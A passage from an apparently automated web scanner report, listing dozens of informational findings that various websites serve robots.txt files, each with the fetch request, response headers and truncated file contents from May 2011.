30.431. http://www.tvgrapevine.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvgrapevine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvgrapevine.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:12:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 13 Apr 2011 05:01:13 GMT
ETag: "75cbaf-130-4a0c5b4132e40"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30.432. http://www.tvmovie.de/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvmovie.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvmovie.de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:29 GMT
Server: Apache
Last-Modified: Tue, 13 Apr 2010 08:19:58 GMT
ETag: "f73fc-13f-48419ed5a2780"
Accept-Ranges: bytes
Content-Length: 319
Vary: Accept-Encoding
Keep-Alive: timeout=3, max=99
Connection: close
Content-Type: text/plain

# Massendownloader sperren
User-agent: wget
User-agent: webzip
User-agent: webmirror
User-agent: webcopy
Disallow: /

# andere Plattformen betreffende Seiten sperren
User-agent: *
Disallow: /imode
Dis
...[SNIP]...

30.433. http://www.twopair.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twopair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.twopair.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Jan 2010 21:50:48 GMT
Accept-Ranges: bytes
ETag: "0ecc478e38fca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:38:00 GMT
Connection: close
Content-Length: 241

User-agent: *
Disallow: /Umbraco/
Disallow: /CSS/
Disallow: /Bin/
Disallow: /Data/
Disallow: /Install/
Disallow: /Templates/
Disallow: /Properties/
Disallow: /umbraco_client/
Disallow: /confi
...[SNIP]...

30.434. http://www.uloric.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uloric.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uloric.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 11 Mar 2011 21:36:02 GMT
Accept-Ranges: bytes
ETag: "0d795134e0cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:09:26 GMT
Connection: close
Content-Length: 223

# Last updated: 03/10/2011

User-agent: *

Disallow: /utilities/media_player.aspx
Disallow: /utilities/privacy.aspx
Disallow: /utilities/terms.aspx
Disallow: /includes/

sitemap: http://www.u
...[SNIP]...

30.435. http://www.undisciplined-subs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.undisciplined-subs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.undisciplined-subs.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:51 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_ssl/2.8.31 OpenSSL/0.9.8c
Last-Modified: Mon, 26 May 2008 09:01:53 GMT
ETag: "17f652f-18-483a7c81"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

30.436. http://www.uni.cc/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uni.cc
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uni.cc

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:37 GMT
Server: Apache/2.2.17 (Win32) PHP/5.2.14
Last-Modified: Thu, 27 Jan 2011 22:38:36 GMT
ETag: "600000000539d-1a-49adb9c388fe4"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.437. http://www.uni.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uni.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uni.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:45 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:06 GMT
ETag: "c010-1c4-49f3cbd158180"
Accept-Ranges: bytes
Content-Length: 452
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /unionline/messdir/
Disallow: /profdev/traits/
Disallow: /rust/
Disallow: /icss/modelcore/
Disallow: /resources/alert/web/
Disallow: /collegeportrait/
Disallow: /mt/
Disallow:
...[SNIP]...

30.438. http://www.unlimitedgamer.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unlimitedgamer.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unlimitedgamer.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:03 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:39:03 GMT
Last-Modified: Thu, 28 Jun 2007 11:00:00 GMT
ETag: "21080ec-65b-468394b0"
Accept-Ranges: bytes
Content-Length: 1627
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

30.439. http://www.unrealitymag.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unrealitymag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unrealitymag.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:21 GMT
Server: Apache
Last-Modified: Tue, 13 Jan 2009 13:18:15 GMT
Accept-Ranges: bytes
Content-Length: 305
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-Agent: Googlebot
Disallow: /archives/
Disallow: /feed/
Disallow: /feed
Disallow: /category/
Disallow: /cgi-bin/
Disallow: /wp-admin/
Disallow: /wp-content/
Disallow: /wp-images/
Disallow
...[SNIP]...

30.440. http://www.unscramble.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unscramble.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unscramble.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:59 GMT
Server: Apache
Last-Modified: Sun, 29 Aug 2010 18:59:14 GMT
ETag: "2c0336-18-f1a60480"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

30.441. http://www.usa4sale.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa4sale.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usa4sale.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: bb2_screener_=1304292404+173.193.214.243; path=/
X-Pingback: http://blog.usa4sale.net/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

30.442. http://www.usahockey.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usahockey.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usahockey.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 71
Content-Type: text/plain
Last-Modified: Tue, 15 Jan 2008 21:36:42 GMT
Accept-Ranges: bytes
ETag: "c58f16b8be57c81:5d2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BALANCEID=mycluster.node3; path=/;
Date: Mon, 02 May 2011 00:18:30 GMT
Connection: close

# robots.txt
User-agent: *
Crawl-delay: 120
Disallow: /cgi-bin/


30.443. http://www.usedpartscentral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usedpartscentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usedpartscentral.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:26 GMT
Server: Apache
Last-Modified: Wed, 03 Dec 2008 13:32:06 GMT
ETag: "1cb8aed-96-7856c180"
Accept-Ranges: bytes
Content-Length: 150
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

# Dissallow access to /cgi-bin/
User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /members/

30.444. http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usjobsources.com
Path:   /MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usjobsources.com

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1034; path=/; expires=Tue, 03-May-2011 04:18:25 GMT
Date: Sun, 01 May 2011 23:32:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Aug 2010 19:04:01 GMT
ETag: "acd4f0-1a-48e31d8578a40"
Accept-Ranges: bytes
Content-Length: 26
P3P: CP="IDC DSP COR CURa ADMa DEVa PSAa PSDa CONi TELi OUR DELa BUS IND PHY UNI PUR COM NAV INT DEM"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

30.445. http://www.vhlcentral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vhlcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vhlcentral.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 26 Apr 2011 13:36:36 GMT
ETag: "9685f5-cc-4a1d269bc6100"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

30.446. http://www.villagehatshop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.villagehatshop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.villagehatshop.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:46 GMT
Server: Apache
Last-Modified: Fri, 10 Sep 2010 21:11:41 GMT
Accept-Ranges: bytes
Content-Length: 273
Cache-Control: max-age=0
Expires: Sun, 01 May 2011 23:26:46 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
Disallow: /pma/
Disallow: /docs/
Disallow: /reviews/
Disallow: /temp/
Disallow: /shopsite-images/
Disallow: /log_report/
Disallow: /log_report_old/
Disallow: /ss-graphics/
Disal
...[SNIP]...

30.447. http://www.virtual-hairstyles.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtual-hairstyles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virtual-hairstyles.com

Response

HTTP/1.1 200 OK
Content-Length: 60
Content-Type: text/plain
Last-Modified: Mon, 22 Nov 2010 13:24:03 GMT
Accept-Ranges: bytes
ETag: "36571d88488acb1:c95b2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:03:36 GMT
Connection: close

User-agent: *
Disallow: /IncludeFiles/
Disallow: /flash/

30.448. http://www.vocal.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vocal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vocal.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:34 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 16 Aug 2010 17:40:42 GMT
ETag: "10dc339-18-54daba80"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.449. http://www.voiceofsandiego.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.voiceofsandiego.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.voiceofsandiego.org

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2095472
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 02 May 2011 00:53:47 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0394
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: voiceofsandiego.org
X-TNCMS-Served-By: cmsapp3
Content-Length: 5595

User-agent: Googlebot
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: *?mode=print
Disallow: /*?print
Disallow: *?mode=comments
Disallow: /*?comments
Disallow: *?mode=sto
...[SNIP]...

30.450. http://www.walthers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walthers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.walthers.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:06 GMT
Server: Apache
Last-Modified: Tue, 05 Oct 2010 17:54:29 GMT
ETag: "1b60b4b-19f-491e25a367f40"
Accept-Ranges: bytes
Content-Length: 415
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 20
Disallow: /exec/cart
Disallow: /exec/checkout
Disallow: /exec/checkout1
Disallow: /exec/checkout2
Disallow: /exec/checkout3
Disallow: /exec/contest
Disallow: /exec/guestb
...[SNIP]...

30.451. http://www.washingtonpost.com/wl/jobs/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 22 Apr 2011 23:10:56 GMT
Content-Type: text/plain; charset=UTF-8
X-Cnection: close
Cache-Control: must-revalidate, max-age=547
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Length: 1142
Connection: close

User-agent: ia_archiver
Disallow: /

User-agent: *
Crawl-delay: 1

# Disallow facets
Disallow: /*_print.html
Disallow: /*_email.html
Disallow: /*_singlePage.html
Disallow: /*_allComments.htm
...[SNIP]...

30.452. http://www.wcpss.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcpss.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wcpss.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:46 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8a DAV/2 PHP/5.2.9 mod_fastcgi/2.4.6 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 14 May 2009 19:13:26 GMT
ETag: "42746-179-469e41f558180"
Accept-Ranges: bytes
Content-Length: 377
Connection: close
Content-Type: text/plain

#this controls robot access to the site

User-agent: *
Disallow: /web-guidelines/ # Internal use only
Disallow: /school_sites_info/ # Internal use only
Disallow: /drop_box/
Disallow: /curriculum-instr
...[SNIP]...

30.453. http://www.webme.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webme.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webme.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:23 GMT
Server: Apache
Last-Modified: Wed, 12 May 2010 12:07:09 GMT
ETag: "8a6c9-19-486647b389540"
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-15

User-Agent: *
Allow: /



30.454. http://www.webstore.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webstore.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 15 Feb 2011 23:58:10 GMT
ETag: "138343-176-49c5aefbd6880"
Accept-Ranges: bytes
Content-Length: 374
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.webstore.com/sitemap.xml
Disallow: /login.php
Disallow: /register.php
Disallow: /contact_us
Disallow: /buy_out
Disallow: /*item_watch*
Disallow: /*help$
Disallow: /su
...[SNIP]...

30.455. http://www.weedsthatplease.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weedsthatplease.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weedsthatplease.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:03:41 GMT
Server: Apache
Last-Modified: Sat, 10 Feb 2007 03:41:28 GMT
ETag: "8480141-49-429170d1f8a00"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /Secure/
Disallow: /scripts/

30.456. http://www.westjet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westjet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.westjet.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 23 Nov 2010 22:33:08 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=41673
Expires: Mon, 02 May 2011 10:48:36 GMT
Date: Sun, 01 May 2011 23:14:03 GMT
Content-Length: 452
Connection: close

User-agent: *
Disallow: /agent/
Disallow: /akamai/
Disallow: /analytics/
Disallow: /campaigns/
Disallow: /common/
Disallow: /corporate/
Disallow: /css/
Disallow: /data/
Disallow: /flash/
Dis
...[SNIP]...

30.457. http://www.whiskeyclips.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whiskeyclips.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whiskeyclips.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:01:37 GMT
Server: Apache
Last-Modified: Sat, 18 Sep 2010 19:30:47 GMT
ETag: "bfea35-17-4c951367"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.458. http://www.whosampled.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whosampled.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whosampled.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 02 May 2011 00:33:24 GMT
Content-Type: text/plain
Content-Length: 84
Last-Modified: Mon, 17 Jan 2011 20:25:25 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /buy/
Disallow: /share/
Disallow: /contact/
Disallow: /add/

30.459. http://www.wirelessadvisor.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wirelessadvisor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wirelessadvisor.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:40:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "631-4bbe6841-2df2062"
Last-Modified: Thu, 08 Apr 2010 23:35:29 GMT
Content-Type: text/plain
Content-Length: 1585

# $Id: robots.txt 898 2010-03-04 17:39:00Z elmuerte $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like
...[SNIP]...

30.460. http://www.wmms.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wmms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wmms.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4122067365
X-Cache-Server: varnish03
Expires: Sun, 01 May 2011 23:29:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:29:33 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

30.461. http://www.womansdivorce.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.womansdivorce.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.womansdivorce.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:53 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.womansdivorce.com/ldKhiLCb.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
D
...[SNIP]...

30.462. http://www.worldnewstwo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldnewstwo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldnewstwo.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 17 Jul 2010 02:12:21 GMT
ETag: "25f87c1-18-48b8bdd93ab40"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


30.463. http://www.worldtvpc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldtvpc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldtvpc.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 06 Feb 2010 15:11:00 GMT
ETag: "ec0059-17a-47eeff9cba900"
Accept-Ranges: bytes
Content-Length: 378
Cache-Control: max-age=7200, private, must-revalidate
Expires: Mon, 02 May 2011 01:11:42 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

Sitemap: http://www.worldtvpc.com/sitemap.xml
User-agent: *
Disallow: /cgi-bin/
Disallow: /onlinevideosites/go.php
Disallow: /blog/wp-content/cache/
Disallow: /blog/wp-content/themes/
Disallow: /blog/
...[SNIP]...

30.464. http://www.wpsdlocal6.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wpsdlocal6.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wpsdlocal6.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 01 May 2011 23:11:28 GMT
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:11:28 GMT
Content-Length: 55
Connection: close
Set-Cookie: click_mobile=0
X-N: S

User-agent: *
Disallow:/search
Disallow:/searchresults

30.465. http://www.wretch.cc/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wretch.cc
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wretch.cc

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:50:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 22 Apr 2011 11:40:10 GMT
Accept-Ranges: bytes
Content-Length: 81
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Age: 0
Via: HTTP/1.1 r2.ycpi.tp2.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5

User-agent: *
Disallow:

Sitemap: http://www.wretch.cc/sitemap/sitemap_index.xml

30.466. http://www.wsfa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wsfa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wsfa.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:a0e"
Cteonnt-Length: 818
Expires: Mon, 02 May 2011 00:52:50 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:52:50 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

30.467. http://www.wtoc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtoc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wtoc.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:ac8"
Cteonnt-Length: 818
Expires: Sun, 01 May 2011 23:42:07 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 01 May 2011 23:42:07 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

30.468. http://www.wtrf.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtrf.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wtrf.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 19 Nov 2010 15:00:14 GMT
Accept-Ranges: bytes
ETag: "96f36678fa87cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:17 GMT
Connection: close
Content-Length: 396

User-agent: *
Disallow: /admin/
Disallow: /ads/
Disallow: /login.cfm
Allow: /

User-agent: Googlebot
Disallow: /mobile/
Disallow: /admin/
Disallow: /ads/
Disallow: /login.cfm
Allow: /

Us
...[SNIP]...

30.469. http://www.wtuber.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtuber.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wtuber.com

